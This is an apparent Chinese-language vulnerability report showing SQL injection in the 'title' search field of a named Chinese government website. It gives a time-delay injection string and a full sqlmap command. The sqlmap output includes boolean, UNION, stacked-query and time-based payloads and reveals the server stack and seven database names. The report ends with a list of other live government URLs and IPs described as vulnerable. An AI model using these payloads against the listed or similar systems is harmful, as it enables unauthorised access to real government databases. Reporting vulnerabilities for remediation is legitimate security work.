以http://qlgk.taixing.gov.cn/webpages/agency_list_page.aspx 作为测试案例
“标题”搜索框内输入:aa' waitfor delay '0:0:5'--
使用burpsuit抓包后再使用sqlmap进行测试:
sqlmap -r /tmp/qlgk.taixing.gov.cn-2.dat -p txtKeyword --dbms mssql --level 5 --risk 3 --dbs -v 1
---
Place: POST
Parameter: txtKeyword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload:txtKeyword=-2038' OR (9422=9422) AND 'Yrjo' LIKE 'Yrjo&Ctr_bTime=&Ctr_eTime=&ddlArticleSort=&dg:_ctl19:JumpList=%E7%A
C%AC1%E9%A1%B5
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload:txtKeyword=ssssssssssssssssss' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(102)+CHAR(117)+CHAR(113)+CHAR(110)
+CHAR(74)+CHAR(118)+CHAR(73)+CHAR(115)+CHAR(120)+CHAR(103)+CHAR(112)+CHAR(98)+CHAR(83)+CHAR(113)+CHAR(103)+CHAR(99)+CHAR(112)+CHAR(113),NULL,NULL-- &Ctr_bTime=&Ctr_eTime=&ddlArticle
Sort=&dg:_ctl19:JumpList=%E7%AC%AC1%E9%A1%B5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload:txtKeyword=ssssssssssssssssss'; WAITFOR DELAY '0:0:5'--&Ctr_bTime=&Ctr_eTime=&ddlArticleSort=&dg:_ctl19:JumpList=%E7%
AC%AC1%E9%A1%B5
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload:txtKeyword=ssssssssssssssssss' WAITFOR DELAY '0:0:5'--&Ctr_bTime=&Ctr_eTime=&ddlArticleSort=&dg:_ctl19:JumpList=%E7%A
C%AC1%E9%A1%B5
---
[15:23:21] [INFO] testing Microsoft SQL Server
[15:23:21] [INFO] confirming Microsoft SQL Server
[15:23:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:23:22] [INFO] fetching database names
available databases [7]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] txgkptweb
[*] txweb
[*] tzmszj


其他测试案例:
http://58.222.216.220/ggweb/webpages/agency_list_page.aspx
http://qlgk.taixing.gov.cn/webpages/agency_list_page.aspx
http://qlgk.taizhou.gov.cn/tzptweb/webpages/agency_list_page.aspx
http://58.222.195.110:8081/jyweb/webpages/agency_list_page.aspx
http://58.222.211.21/xhweb/webpages/agency_list_page.aspx